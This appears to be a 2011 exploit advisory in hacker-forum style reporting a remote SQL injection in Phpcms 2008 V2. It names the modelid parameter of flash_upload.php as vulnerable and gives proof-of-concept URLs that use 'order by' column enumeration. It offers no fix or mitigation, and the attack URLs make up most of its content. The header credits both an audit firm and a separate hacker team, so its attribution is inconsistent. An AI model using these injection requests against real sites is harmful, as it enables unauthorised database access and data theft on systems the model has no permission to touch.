# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 5/2011

Phpcms 2008 SQL Injection Vulnerability

~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn

[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^]� Xp10_hAcKEr
[?]

======================================================================================
# REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================

[*] Err0r C0N50L3:


http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON




[*] prove of concept =


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)


Already Tested on Win Xp